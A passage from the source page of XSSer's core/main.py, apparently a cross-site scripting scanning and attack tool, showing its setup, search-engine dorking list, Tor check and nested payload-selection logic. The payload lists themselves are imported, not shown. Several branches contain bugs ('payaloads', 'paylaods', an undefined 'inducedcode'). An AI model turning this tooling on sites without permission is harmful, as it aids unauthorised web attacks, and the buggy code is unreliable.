Home Explore Help
Sign In
epsylon
/
xsser
Watch 1
Star 0
Fork 0
Files Issues 0 Pull Requests 0
Tree: c8e77231c5
Branches Tags
xsser
/
core
/
main.py

main.py 186 KB
History Raw

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717718719720721722723724725726727728729730731732733734735736737738739740741742743744745746747748749750751752753754755756757758759760761762763764765766767768769770771772773774775776777778779780781782783784785786787788789790791792793794795796797798799800801802803804805806807808809810811812813814815816817818819820821822823824825826827828829830831832833834835836837838839840841842843844845846847848849850851852853854855856857858859860861862863864865866867868869870871872873874875876877878879880881882883884885886887888889890891892893894895896897898899900901902903904905906907908909910911912913914915916917918919920921922923924925926927928929930931932933934935936937938939940941942943944945946947948949950951952953954955956957958959960961962963964965966967968969970971972973974975976977978979980981982983984985986987988989990991992993994995996997998999100010011002100310041005100610071008100910101011101210131014101510161017101810191020102110221023102410251026102710281029103010311032103310341035103610371038103910401041104210431044104510461047104810491050105110521053105410551056105710581059106010611062106310641065106610671068106910701071107210731074107510761077107810791080108110821083108410851086108710881089109010911092109310941095109610971098109911001101110211031104110511061107110811091110111111121113111411151116111711181119112011211122112311241125112611271128112911301131113211331134113511361137113811391140114111421143114411451146114711481149115011511152115311541155115611571158115911601161116211631164116511661167116811691170117111721173117411751176117711781179118011811182118311841185118611871188118911901191119211931194119511961197119811991200120112021203120412051206120712081209121012111212121312141215121612171218121912201221122212231224122512261227122812291230123112321233123412351236123712381239124012411242124312441245124612471248124912501251125212531254125512561257125812591260126112621263126412651266126712681269127012711272127312741275127612771278127912801281128212831284128512861287128812891290129112921293129412951296129712981299130013011302130313041305130613071308130913101311131213131314131513161317131813191320132113221323132413251326132713281329133013311332133313341335133613371338133913401341134213431344134513461347134813491350135113521353135413551356135713581359136013611362136313641365136613671368136913701371137213731374137513761377137813791380138113821383138413851386138713881389139013911392139313941395139613971398139914001401140214031404140514061407140814091410141114121413141414151416141714181419142014211422142314241425142614271428142914301431143214331434143514361437143814391440144114421443144414451446144714481449145014511452145314541455145614571458145914601461146214631464146514661467146814691470147114721473147414751476147714781479148014811482148314841485148614871488148914901491149214931494149514961497149814991500150115021503150415051506150715081509151015111512151315141515151615171518151915201521152215231524152515261527152815291530153115321533153415351536153715381539154015411542154315441545154615471548154915501551155215531554155515561557155815591560156115621563156415651566156715681569157015711572157315741575157615771578157915801581158215831584158515861587158815891590159115921593159415951596159715981599160016011602160316041605160616071608160916101611161216131614161516161617161816191620162116221623162416251626162716281629163016311632163316341635163616371638163916401641164216431644164516461647164816491650165116521653165416551656165716581659166016611662166316641665166616671668166916701671167216731674167516761677167816791680168116821683168416851686168716881689169016911692169316941695169616971698169917001701170217031704170517061707170817091710171117121713171417151716171717181719172017211722172317241725172617271728172917301731173217331734173517361737173817391740174117421743174417451746174717481749175017511752175317541755175617571758175917601761176217631764176517661767176817691770177117721773177417751776177717781779178017811782178317841785178617871788178917901791179217931794179517961797179817991800180118021803180418051806180718081809181018111812181318141815181618171818181918201821182218231824182518261827182818291830183118321833183418351836183718381839184018411842184318441845184618471848184918501851185218531854185518561857185818591860186118621863186418651866186718681869187018711872187318741875187618771878187918801881188218831884188518861887188818891890189118921893189418951896189718981899190019011902190319041905190619071908190919101911191219131914191519161917191819191920192119221923192419251926192719281929193019311932193319341935193619371938193919401941194219431944194519461947194819491950195119521953195419551956195719581959196019611962196319641965196619671968196919701971197219731974197519761977197819791980198119821983198419851986198719881989199019911992199319941995199619971998199920002001200220032004200520062007200820092010201120122013201420152016201720182019202020212022202320242025202620272028202920302031203220332034203520362037203820392040204120422043204420452046204720482049205020512052205320542055205620572058205920602061206220632064206520662067206820692070207120722073207420752076207720782079208020812082208320842085208620872088208920902091209220932094209520962097209820992100210121022103210421052106210721082109211021112112211321142115211621172118211921202121212221232124212521262127212821292130213121322133213421352136213721382139214021412142214321442145214621472148214921502151215221532154215521562157215821592160216121622163216421652166216721682169217021712172217321742175217621772178217921802181218221832184218521862187218821892190219121922193219421952196219721982199220022012202220322042205220622072208220922102211221222132214221522162217221822192220222122222223222422252226222722282229223022312232223322342235223622372238223922402241224222432244224522462247224822492250225122522253225422552256225722582259226022612262226322642265226622672268226922702271227222732274227522762277227822792280228122822283228422852286228722882289229022912292229322942295229622972298229923002301230223032304230523062307230823092310231123122313231423152316231723182319232023212322232323242325232623272328232923302331233223332334233523362337233823392340234123422343234423452346234723482349235023512352235323542355235623572358235923602361236223632364236523662367236823692370237123722373237423752376237723782379238023812382238323842385238623872388238923902391239223932394239523962397239823992400240124022403240424052406240724082409241024112412241324142415241624172418241924202421242224232424242524262427242824292430243124322433243424352436243724382439244024412442244324442445244624472448244924502451245224532454245524562457245824592460246124622463246424652466246724682469247024712472247324742475247624772478247924802481248224832484248524862487248824892490249124922493249424952496249724982499250025012502250325042505250625072508250925102511251225132514251525162517251825192520252125222523252425252526252725282529253025312532253325342535253625372538253925402541254225432544254525462547254825492550255125522553255425552556255725582559256025612562256325642565256625672568256925702571257225732574257525762577257825792580258125822583258425852586258725882589259025912592259325942595259625972598259926002601260226032604260526062607260826092610261126122613261426152616261726182619262026212622262326242625262626272628262926302631263226332634263526362637263826392640264126422643264426452646264726482649265026512652265326542655265626572658265926602661266226632664266526662667266826692670267126722673267426752676267726782679268026812682268326842685268626872688268926902691269226932694269526962697269826992700270127022703270427052706270727082709271027112712271327142715271627172718271927202721272227232724272527262727272827292730273127322733273427352736273727382739274027412742274327442745274627472748274927502751275227532754275527562757275827592760276127622763276427652766276727682769277027712772277327742775277627772778277927802781278227832784278527862787278827892790279127922793279427952796279727982799280028012802280328042805280628072808280928102811281228132814281528162817281828192820282128222823282428252826282728282829283028312832283328342835283628372838283928402841284228432844284528462847284828492850285128522853285428552856285728582859286028612862286328642865286628672868286928702871287228732874287528762877287828792880288128822883288428852886288728882889289028912892289328942895289628972898289929002901290229032904290529062907290829092910291129122913291429152916291729182919292029212922292329242925292629272928292929302931293229332934293529362937293829392940294129422943294429452946294729482949295029512952295329542955295629572958295929602961296229632964296529662967296829692970297129722973297429752976297729782979298029812982298329842985298629872988298929902991299229932994299529962997299829993000300130023003300430053006300730083009301030113012301330143015301630173018301930203021302230233024302530263027302830293030303130323033303430353036303730383039304030413042304330443045304630473048304930503051305230533054305530563057305830593060306130623063306430653066306730683069307030713072307330743075307630773078307930803081308230833084308530863087308830893090309130923093309430953096309730983099310031013102310331043105310631073108310931103111311231133114311531163117311831193120312131223123312431253126312731283129313031313132313331343135313631373138313931403141314231433144314531463147314831493150315131523153315431553156315731583159316031613162316331643165316631673168316931703171317231733174317531763177317831793180318131823183318431853186318731883189319031913192319331943195319631973198319932003201320232033204320532063207320832093210321132123213321432153216321732183219322032213222322332243225322632273228322932303231323232333234323532363237323832393240324132423243324432453246324732483249325032513252325332543255325632573258325932603261326232633264326532663267326832693270327132723273327432753276327732783279328032813282328332843285328632873288328932903291329232933294329532963297329832993300330133023303330433053306330733083309331033113312331333143315331633173318331933203321332233233324332533263327332833293330333133323333333433353336333733383339334033413342334333443345334633473348334933503351335233533354335533563357335833593360336133623363336433653366336733683369337033713372337333743375337633773378337933803381338233833384338533863387338833893390339133923393339433953396339733983399340034013402340334043405340634073408340934103411341234133414341534163417341834193420342134223423342434253426342734283429343034313432343334343435343634373438343934403441344234433444344534463447344834493450345134523453345434553456345734583459346034613462346334643465346634673468346934703471347234733474347534763477347834793480348134823483348434853486348734883489349034913492349334943495349634973498349935003501350235033504350535063507350835093510351135123513351435153516351735183519352035213522352335243525352635273528352935303531353235333534 
  1. #!/usr/bin/env python
    2. 

  2. # -*- coding: utf-8 -*-"
    3. 

  3. # vim: set expandtab tabstop=4 shiftwidth=4:
    4. 

  4. """
    5. 

  5. This file is part of the XSSer project, https://xsser.03c8.net
    6. 

  6. 

  7. Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
    8. 

  8. 

  9. xsser is free software; you can redistribute it and/or modify it under
    10. 

  10. the terms of the GNU General Public License as published by the Free
    11. 

  11. Software Foundation version 3 of the License.
    12. 

  12. 

  13. xsser is distributed in the hope that it will be useful, but WITHOUT ANY
    14. 

  14. WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
    15. 

  15. FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
    16. 

  16. details.
    17. 

  17. 

  18. You should have received a copy of the GNU General Public License along
    19. 

  19. with xsser; if not, write to the Free Software Foundation, Inc., 51
    20. 

  20. Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
    21. 

  21. """
    22. 

  22. import os, re, sys, datetime, hashlib, time, urllib.request, urllib.parse, urllib.error, cgi, traceback, webbrowser, random
    23. 

  23. from random import randint
    24. 

  24. from base64 import b64encode, b64decode
    25. 

  25. import core.fuzzing
    26. 

  26. import core.fuzzing.vectors
    27. 

  27. import core.fuzzing.DCP
    28. 

  28. import core.fuzzing.DOM
    29. 

  29. import core.fuzzing.HTTPsr
    30. 

  30. import core.fuzzing.heuristic
    31. 

  31. from collections import defaultdict
    32. 

  32. from itertools import islice, chain
    33. 

  33. from urllib.parse import parse_qs, urlparse
    34. 

  34. from core.curlcontrol import Curl
    35. 

  35. from core.encdec import EncoderDecoder
    36. 

  36. from core.options import XSSerOptions
    37. 

  37. from core.dork import Dorker
    38. 

  38. from core.crawler import Crawler
    39. 

  39. from core.imagexss import ImageInjections
    40. 

  40. from core.flashxss import FlashInjections
    41. 

  41. from core.post.xml_exporter import xml_reporting
    42. 

  42. from core.tokenhub import HubThread
    43. 

  43. from core.reporter import XSSerReporter
    44. 

  44. from core.threadpool import ThreadPool, NoResultsPending
    45. 

  45. from core.update import Updater
    46. 

  46. 

  47. # set to emit debug messages about errors (0 = off).
    48. 

  48. DEBUG = 0
    49. 

  49. 

  50. class xsser(EncoderDecoder, XSSerReporter):
    51. 

  51.     """
    52. 

  52.     XSSer application class
    53. 

  53.     """
    54. 

  54.     def __init__(self, mothership=None):
    55. 

  55.         self._reporter = None
    56. 

  56.         self._reporters = []
    57. 

  57.         self._landing = False
    58. 

  58.         self._ongoing_requests = 0
    59. 

  59.         self._oldcurl = []
    60. 

  60.         self._gtkdir = None
    61. 

  61.         self._webbrowser = webbrowser
    62. 

  62.         self.crawled_urls = []
    63. 

  63.         self.checked_urls = []
    64. 

  64.         self.successful_urls = []
    65. 

  65.         self.urlmalformed = False
    66. 

  66.         self.search_engines = [] # available dorking search engines
    67. 

  67.         self.search_engines.append('bing') # [26/08/2019: OK!]
    68. 

  68.         self.search_engines.append('yahoo') # [26/08/2019: OK!]
    69. 

  69.         self.search_engines.append('startpage') # [26/08/2019: OK!]
    70. 

  70.         self.search_engines.append('duck') # [26/08/2019: OK!]
    71. 

  71.         #self.search_engines.append('google')
    72. 

  72.         #self.search_engines.append('yandex')
    73. 

  73.         self.user_template = None # wizard user template
    74. 

  74.         self.user_template_conntype = "GET" # GET by default
    75. 

  75.         self.check_tor_url = 'https://check.torproject.org/' # TOR status checking site
    76. 

  76. 

  77.         if not mothership:
    78. 

  78.             # no mothership so *this* is the mothership
    79. 

  79.             # start the communications hub and rock on!
    80. 

  80.             self.hub = None
    81. 

  81.             self.pool = ThreadPool(0)
    82. 

  82.             self.mothership = None
    83. 

  83.             self.final_attacks = {}
    84. 

  84.         else:
    85. 

  85.             self.hub = None
    86. 

  86.             self.mothership = mothership
    87. 

  87.             self.mothership.add_reporter(self)
    88. 

  88.             self.pool = ThreadPool(0)
    89. 

  89.             self.final_attacks = self.mothership.final_attacks
    90. 

  90. 

  91.         # initialize the url encoder/decoder
    92. 

  92.         EncoderDecoder.__init__(self)
    93. 

  93. 

  94.         # your unique real opponent
    95. 

  95.         self.time = datetime.datetime.now()
    96. 

  96. 

  97.         # this payload comes with vector already..
    98. 

  98.         self.DEFAULT_XSS_PAYLOAD = 'XSS'
    99. 

  99. 

  100.         # to be or not to be...
    101. 

  101.         self.hash_found = []
    102. 

  102.         self.hash_notfound = []
    103. 

  103. 

  104.         # other hashes
    105. 

  105.         self.hashed_injections={}
    106. 

  106.         self.extra_hashed_injections={}
    107. 

  107.         self.extra_hashed_vector_url = {}
    108. 

  108.         self.final_hashes = {} # final hashes used by each method
    109. 

  109. 

  110.         # some counters for checker systems
    111. 

  111.         self.errors_isalive = 0
    112. 

  112.         self.next_isalive = False
    113. 

  113.         self.flag_isalive_num = 0
    114. 

  114.         self.rounds = 0
    115. 

  115.         self.round_complete = 0
    116. 

  116.         
    117. 

  117.         # some controls about targets
    118. 

  118.         self.urlspoll = []
    119. 

  119. 

  120.         # some statistics counters for connections
    121. 

  121.         self.success_connection = 0
    122. 

  122.         self.not_connection = 0
    123. 

  123.         self.forwarded_connection = 0
    124. 

  124.         self.other_connection = 0
    125. 

  125. 

  126. 	    # some statistics counters for payloads
    127. 

  127.         self.xsr_injection = 0
    128. 

  128.         self.xsa_injection = 0
    129. 

  129.         self.coo_injection = 0
    130. 

  130.         self.manual_injection = 0
    131. 

  131.         self.auto_injection = 0
    132. 

  132.         self.dcp_injection = 0
    133. 

  133.         self.dom_injection = 0
    134. 

  134.         self.httpsr_injection = 0
    135. 

  135.         self.check_positives = 0
    136. 

  136.         
    137. 

  137.         # some statistics counters for injections found
    138. 

  138.         self.xsr_found = 0
    139. 

  139.         self.xsa_found = 0
    140. 

  140.         self.coo_found = 0
    141. 

  141.         self.manual_found = 0
    142. 

  142.         self.auto_found = 0
    143. 

  143.         self.dcp_found = 0
    144. 

  144.         self.dom_found = 0
    145. 

  145.         self.httpsr_found = 0
    146. 

  146.         self.false_positives = 0
    147. 

  147. 

  148. 	    # some statistics counters for heuristic parameters
    149. 

  149.         self.heuris_hashes = []
    150. 

  150.         self.heuris_backslash_found = 0
    151. 

  151.         self.heuris_une_backslash_found = 0
    152. 

  152.         self.heuris_dec_backslash_found = 0
    153. 

  153.         self.heuris_backslash_notfound = 0
    154. 

  154.         self.heuris_slash_found = 0
    155. 

  155.         self.heuris_une_slash_found = 0
    156. 

  156.         self.heuris_dec_slash_found = 0
    157. 

  157.         self.heuris_slash_notfound = 0
    158. 

  158.         self.heuris_mayor_found = 0
    159. 

  159.         self.heuris_une_mayor_found = 0
    160. 

  160.         self.heuris_dec_mayor_found = 0
    161. 

  161.         self.heuris_mayor_notfound = 0
    162. 

  162.         self.heuris_minor_found = 0
    163. 

  163.         self.heuris_une_minor_found = 0
    164. 

  164.         self.heuris_dec_minor_found = 0
    165. 

  165.         self.heuris_minor_notfound = 0
    166. 

  166.         self.heuris_semicolon_found = 0
    167. 

  167.         self.heuris_une_semicolon_found = 0
    168. 

  168.         self.heuris_dec_semicolon_found = 0
    169. 

  169.         self.heuris_semicolon_notfound = 0
    170. 

  170.         self.heuris_colon_found = 0
    171. 

  171.         self.heuris_une_colon_found = 0
    172. 

  172.         self.heuris_dec_colon_found = 0
    173. 

  173.         self.heuris_colon_notfound = 0
    174. 

  174.         self.heuris_doublecolon_found = 0
    175. 

  175.         self.heuris_une_doublecolon_found = 0
    176. 

  176.         self.heuris_dec_doublecolon_found = 0
    177. 

  177.         self.heuris_doublecolon_notfound = 0
    178. 

  178.         self.heuris_equal_found = 0
    179. 

  179.         self.heuris_une_equal_found = 0
    180. 

  180.         self.heuris_dec_equal_found = 0
    181. 

  181.         self.heuris_equal_notfound = 0
    182. 

  182. 

  183.         # xsser verbosity (0 - no output, 1 - dots only, 2+ - real verbosity)
    184. 

  184.         self.verbose = 2
    185. 

  185.         self.options = None
    186. 

  186. 

  187.     def __del__(self):
    188. 

  188.         if not self._landing:
    189. 

  189.             self.land()
    190. 

  190. 

  191.     def get_gtk_directory(self):
    192. 

  192.         if self._gtkdir:
    193. 

  193.             return self._gtkdir
    194. 

  194.         local_path = os.path.join(os.path.dirname(os.path.dirname(__file__)),
    195. 

  195.                                   'gtk')
    196. 

  196.         if os.path.exists(local_path):
    197. 

  197.             self._gtkdir = local_path
    198. 

  198.             return self._gtkdir
    199. 

  199.         elif os.path.exists('/usr/share/xsser/gtk'):
    200. 

  200.             self._gtkdir = '/usr/share/xsser/gtk'
    201. 

  201.             return self._gtkdir
    202. 

  202. 

  203.     def set_webbrowser(self, browser):
    204. 

  204.         self._webbrowser = browser
    205. 

  205. 

  206.     def set_reporter(self, reporter):
    207. 

  207.         self._reporter = reporter
    208. 

  208. 

  209.     def add_reporter(self, reporter):
    210. 

  210.         self._reporters.append(reporter)
    211. 

  211. 

  212.     def remove_reporter(self, reporter):
    213. 

  213.         if reporter in self._reporters:
    214. 

  214.             self._reporters.remove(reporter)
    215. 

  215. 

  216.     def generate_hash(self, attack_type='default'):
    217. 

  217.         """
    218. 

  218.         Generate a new hash for a type of attack.
    219. 

  219.         """
    220. 

  220.         date = str(datetime.datetime.now())
    221. 

  221.         encoded_hash = date + attack_type
    222. 

  222.         return hashlib.md5(encoded_hash.encode('utf-8')).hexdigest()
    223. 

  223. 

  224.     def generate_numeric_hash(self): # 32 length as md5
    225. 

  225.         """
    226. 

  226.         Generate a new hash for numeric only XSS
    227. 

  227.         """
    228. 

  228.         newhash = ''.join(random.choice('0123456789') for i in range(32)) 
    229. 

  229.         return newhash
    230. 

  230. 

  231.     def report(self, msg, level='info'):
    232. 

  232.         """
    233. 

  233.         Report some error from the application.
    234. 

  234. 

  235.         levels: debug, info, warning, error
    236. 

  236.         """
    237. 

  237.         if self.verbose == 2:
    238. 

  238.             prefix = ""
    239. 

  239.             if level != 'info':
    240. 

  240.                 prefix = "["+level+"] "
    241. 

  241.             print(msg)
    242. 

  242.         elif self.verbose:
    243. 

  243.             if level == 'error':
    244. 

  244.                 sys.stdout.write("*")
    245. 

  245.             else:
    246. 

  246.                 sys.stdout.write(".")
    247. 

  247.         for reporter in self._reporters:
    248. 

  248.             reporter.post(msg)
    249. 

  249.         if self._reporter:
    250. 

  250.             from twisted.internet import reactor
    251. 

  251.             reactor.callFromThread(self._reporter.post, msg)
    252. 

  252. 

  253.     def set_options(self, options):
    254. 

  254.         """
    255. 

  255.         Set xsser options
    256. 

  256.         """
    257. 

  257.         self.options = options
    258. 

  258.         self._opt_request()
    259. 

  259. 

  260.     def _opt_request(self):
    261. 

  261.         """
    262. 

  262.         Pass on some properties to Curl
    263. 

  263.         """
    264. 

  264.         options = self.options
    265. 

  265.         for opt in ['cookie', 'agent', 'referer',\
    266. 

  266. 			'headers', 'atype', 'acred', 'acert',
    267. 

  267. 			'proxy', 'ignoreproxy', 'timeout', 
    268. 

  268.             'delay', 'tcp_nodelay', 'retries', 
    269. 

  269.             'xforw', 'xclient', 'threads', 
    270. 

  270.             'dropcookie', 'followred', 'fli',
    271. 

  271.             'nohead', 'isalive', 'alt', 'altm',
    272. 

  272.             'ald'
    273. 

  273. 			]:
    274. 

  274.             if hasattr(options, opt) and getattr(options, opt):
    275. 

  275.                 setattr(Curl, opt, getattr(options, opt))
    276. 

  276. 

  277.     def get_payloads(self):
    278. 

  278.         """
    279. 

  279.         Process payload options and make up the payload list for the attack.
    280. 

  280.         """
    281. 

  281.         options = self.options
    282. 

  282.     	# payloading sources for --auto
    283. 

  283.         payloads_fuzz = core.fuzzing.vectors.vectors
    284. 

  284.         if options.fzz_info or options.fzz_num or options.fzz_rand and not options.fuzz:
    285. 

  285.             self.options.fuzz = True
    286. 

  286.         # set a type for XSS auto-fuzzing vectors
    287. 

  287.         if options.fzz_info:
    288. 

  288.             fzz_payloads = []
    289. 

  289.             for fuzz in payloads_fuzz:
    290. 

  290.                 if not fuzz["browser"] == "[Not Info]":
    291. 

  291.                     fzz_payloads.append(fuzz)
    292. 

  292.             payloads_fuzz = fzz_payloads
    293. 

  293.         # set a limit for XSS auto-fuzzing vectors
    294. 

  294.         if options.fzz_num:
    295. 

  295.             try:
    296. 

  296.                 options.fzz_num = int(options.fzz_num)
    297. 

  297.             except:
    298. 

  298.                 options.fzz_num = len(payloads_fuzz)
    299. 

  299.             fzz_num_payloads = []
    300. 

  300.             fzz_vector = 0
    301. 

  301.             for fuzz in payloads_fuzz:
    302. 

  302.                 fzz_vector = fzz_vector + 1
    303. 

  303.                 if int(fzz_vector) < int(options.fzz_num)+1:
    304. 

  304.                     fzz_num_payloads.append(fuzz)
    305. 

  305.             payloads_fuzz = fzz_num_payloads
    306. 

  306.         # set random order for XSS auto-fuzzing vectors
    307. 

  307.         if options.fzz_rand:
    308. 

  308.             try:
    309. 

  309.                 from random import shuffle
    310. 

  310.                 shuffle(payloads_fuzz) # shuffle paylods
    311. 

  311.             except:
    312. 

  312.                 pass
    313. 

  313.         payloads_dcp = core.fuzzing.DCP.DCPvectors
    314. 

  314.         payloads_dom = core.fuzzing.DOM.DOMvectors
    315. 

  315.         payloads_httpsr = core.fuzzing.HTTPsr.HTTPrs_vectors
    316. 

  316.         manual_payload = [{"payload":options.script, "browser":"[manual_injection]"}]
    317. 

  317.         # sustitute payload for hash to check for false positives
    318. 

  318.         self.hashed_payload = "XSS"
    319. 

  319.         checker_payload = [{"payload":self.hashed_payload, "browser":"[hashed_precheck_system]"}]
    320. 

  320.         # heuristic parameters
    321. 

  321.         heuristic_params = core.fuzzing.heuristic.heuristic_test
    322. 

  322.         def enable_options_heuristic(payloads):
    323. 

  323.             if options.heuristic:
    324. 

  324.                 payloads = heuristic_params + payloads
    325. 

  325.                 if options.dom:
    326. 

  326.                     payloads = payloads + payloads_dom
    327. 

  327.             return payloads
    328. 

  328.         if options.fuzz:
    329. 

  329.             payloads = payloads_fuzz
    330. 

  330.             if options.dcp:
    331. 

  331.                 payloads = payloads + payloads_dcp
    332. 

  332.                 if options.script:
    333. 

  333.                     payloads = payloads + manual_payload
    334. 

  334.                     if options.hash:
    335. 

  335.                         payloads = checker_payload + payloads
    336. 

  336.                         if options.inducedcode:
    337. 

  337.                             payloads = payloads + payloads_httpsr
    338. 

  338.                             if options.heuristic:
    339. 

  339.                                 payloads = heuristic_params + payloads
    340. 

  340.                                 if options.dom:
    341. 

  341.                                     payloads = payloads + payloads_dom
    342. 

  342.                     elif options.inducedcode:
    343. 

  343.                         payloads = payloads + payloads_httpsr
    344. 

  344.                         if options.heuristic:
    345. 

  345.                             payloads = heuristic_params + payloads
    346. 

  346.                             if options.dom:
    347. 

  347.                                 payloads = payloads + payloads_dom
    348. 

  348.                         elif options.dom:
    349. 

  349.                             payloads = payloads + payloads_dom
    350. 

  350.                     elif options.heuristic:
    351. 

  351.                         payloads = heuristic_params + payloads
    352. 

  352.                         if options.dom:
    353. 

  353.                             payloads = payloads + payloads_dom
    354. 

  354.                     elif options.dom:
    355. 

  355.                         payloads = payloads + payloads_dom
    356. 

  356.                 elif options.hash:
    357. 

  357.                     payloads = checker_payload + payloads
    358. 

  358.                     if options.inducedcode:
    359. 

  359.                         payloads = payloads + payloads_httpsr
    360. 

  360.                         if options.heuristic:
    361. 

  361.                             payloads = heuristic_params + payloads
    362. 

  362.                             if options.dom:
    363. 

  363.                                 payloads = payloads + payloads_dom
    364. 

  364.                         elif options.dom:
    365. 

  365.                             payloads = payloads + payloads_dom
    366. 

  366.                 elif options.inducedcode:
    367. 

  367.                     payloads = payloads + payloads_httpsr
    368. 

  368.                     if options.heuristic:
    369. 

  369.                         payloads = heuristic_params + payloads
    370. 

  370.                         if options.dom:
    371. 

  371.                             payloads = payloads + payloads_dom
    372. 

  372.                     elif options.dom:
    373. 

  373.                         payloads = payloads + payloads_dom
    374. 

  374.             elif options.script:
    375. 

  375.                 payloads = payloads + manual_payload
    376. 

  376.                 if options.hash:
    377. 

  377.                     payloads = checker_payload + payloads
    378. 

  378.                     if options.inducedcode:
    379. 

  379.                         payloads = payaloads + payloads_httpsr
    380. 

  380.                         if options.heuristic:
    381. 

  381.                             payloads = heuristic_params + payloads
    382. 

  382.                             if options.dom:
    383. 

  383.                                 payloads = payloads + payloads_dom
    384. 

  384.             elif options.hash:
    385. 

  385.                 payloads = checker_payload + payloads
    386. 

  386.                 if options.inducedcode:
    387. 

  387.                     payloads = payloads + payloads_httpsr
    388. 

  388.                     if options.heuristic:
    389. 

  389.                         payloads = heuristic_params + payloads
    390. 

  390.                         if options.dom:
    391. 

  391.                             payloads = payloads + payloads_dom
    392. 

  392.                     elif options.dom:
    393. 

  393.                         payloads = payloads + payloads_dom
    394. 

  394.                 elif options.heuristic:
    395. 

  395.                     payloads = heuristic_params + payloads
    396. 

  396.                     if options.dom:
    397. 

  397.                         payloads = payloads + payloads_dom
    398. 

  398.                 elif options.dom:
    399. 

  399.                     payloads = payloads + payloads_dom
    400. 

  400.             elif options.inducedcode:
    401. 

  401.                 payloads = payloads + payloads_httpsr
    402. 

  402.                 if options.hash:
    403. 

  403.                     payloads = checker_payload + payloads
    404. 

  404.                     if options.heuristic:
    405. 

  405.                         payloads = heuristic_params + payloads
    406. 

  406.                         if options.dom:
    407. 

  407.                             payloads = payloads + payloads_dom
    408. 

  408.                     elif options.dom:
    409. 

  409.                         payloads = payloads + payloads_dom
    410. 

  410.             elif options.heuristic:
    411. 

  411.                 payloads = heuristic_params + payloads
    412. 

  412.                 if options.dom:
    413. 

  413.                     payloads = payloads + payloads_dom
    414. 

  414.             elif options.dom:
    415. 

  415.                 payloads = payloads + payloads_dom
    416. 

  416.         elif options.dcp:
    417. 

  417.             payloads = payloads_dcp
    418. 

  418.             if options.script:
    419. 

  419.                 payloads = payloads + manual_payload
    420. 

  420.                 if options.hash:
    421. 

  421.                     payloads = checker_payload + payloads
    422. 

  422.                     if options.inducedcode:
    423. 

  423.                         payloads = payloads + payloads_httpsr
    424. 

  424.                         if options.heuristic:
    425. 

  425.                             payloads = heuristic_params + payloads
    426. 

  426.                             if options.dom:
    427. 

  427.                                 payloads = payloads + payloads_dom
    428. 

  428.             elif options.hash:
    429. 

  429.                 payloads = checker_payload + payloads
    430. 

  430.                 if options.inducedcode:
    431. 

  431.                     payloads = payloads + inducedcode
    432. 

  432.                     if options.heuristic:
    433. 

  433.                         payloads = heuristic_params + payloads
    434. 

  434.                         if options.dom:
    435. 

  435.                             payloads = payloads + payloads_dom
    436. 

  436.                     elif options.dom:
    437. 

  437.                         payloads = payloads + payloads_dom
    438. 

  438.             elif options.inducedcode:
    439. 

  439.                 payloads = payloads + payloads_httpsr
    440. 

  440.                 if options.heuristic:
    441. 

  441.                     payloads = heuristic_params + payloads
    442. 

  442.                     if options.dom:
    443. 

  443.                         payloads = payloads + payloads_dom
    444. 

  444.                 elif options.dom:
    445. 

  445.                     payloads = payloads + payloads_dom
    446. 

  446.             elif options.heuristic:
    447. 

  447.                 payloads = heuristic_params + payloads
    448. 

  448.                 if options.dom:
    449. 

  449.                     payloads = payloads + payloads_dom
    450. 

  450.             elif options.dom:
    451. 

  451.                 payloads = payloads + payloads_dom
    452. 

  452.         elif options.script:
    453. 

  453.             payloads = manual_payload
    454. 

  454.             if options.hash:
    455. 

  455.                 payloads = checker_payload + payloads
    456. 

  456.                 if options.inducedcode:
    457. 

  457.                     payloads = payloads + payloads_httpsr
    458. 

  458.                     if options.heuristic:
    459. 

  459.                         payloads = heuristic_params + payloads
    460. 

  460.                         if options.dom:
    461. 

  461.                             payloads = payloads + payloads_dom
    462. 

  462.             elif options.inducedcode:
    463. 

  463.                 payloads = payloads + payloads_httpsr
    464. 

  464.                 if options.heuristic:
    465. 

  465.                     payloads = heuristic_params + payloads
    466. 

  466.                     if options.dom:
    467. 

  467.                         payloads = payloads + payloads_dom
    468. 

  468.                 elif options.dom:
    469. 

  469.                     payloads = payloads + payloads_dom
    470. 

  470.             elif options.heuristic:
    471. 

  471.                 payloads = heuristic_params + payloads
    472. 

  472.                 if options.dom:
    473. 

  473.                     paylaods = payloads + payloads_dom
    474. 

  474.             elif options.dom:
    475. 

  475.                 payloads = payloads + payloads_dom
    476. 

  476.         elif options.inducedcode:
    477. 

  477.             payloads = payloads_httpsr
    478. 

  478.             if options.hash:
    479. 

  479.                 payloads = checker_payload + payloads
    480. 

  480.                 if options.heuristic:
    481. 

  481.                     payloads = heuristic_params + payloads
    482. 

  482.                     if options.dom:
    483. 

  483.                         payloads = payloads + payloads_dom
    484. 

  484.             elif options.heuristic:
    485. 

  485.                 payloads = heuristic_params + payloads
    486. 

  486.                 if options.dom:
    487. 

  487.                     payloads = payloads + payloads_dom
    488. 

  488.             elif options.dom:
    489. 

  489.                 payloads = payloads + payloads_dom
    490. 

  490.         elif options.heuristic:
    491. 

  491.             payloads = heuristic_params
    492. 

  492.             if options.hash:
    493. 

  493.                 payloads = checker_payload + payloads
    494. 

  494.                 if options.dom:
    495. 

